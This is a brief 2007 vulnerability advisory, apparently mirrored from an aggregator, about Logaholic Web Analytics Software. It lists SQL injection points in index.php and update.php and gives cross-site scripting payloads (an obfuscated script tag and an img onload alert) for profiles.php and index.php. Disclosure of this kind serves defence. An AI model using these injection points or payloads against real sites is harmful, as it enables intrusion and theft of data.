Lucene search
SecurityvulnsSECURITYVULNS:DOC:18729HistoryDec 24, 2007 - 12:00 a.m.
Logaholic Web Analytics Software
2007-12-2400:00:00
vulners.com
33
Logaholic Web Analytics Software
Bug found by malibu.r
Contact: [email protected]
[*]SQL Injection
GET /logaholic/index.php?conf=nameofprofile&from=SQL INJECTION
GET /logaholic/update.php?conf=nameofprofile&page=SQL INjection
[*]Cross Site Scripting
POST variable "newconfname" in profiles.php?conf=nameofprofile to
>"><ScRiPt%20%0a%0d>alert(xss)%3B</ScRiPt> in /logaholic/profiles.php
index.php?conf=<img+src=http://testingsite.com/yep.gif+onload=alert(812051443)>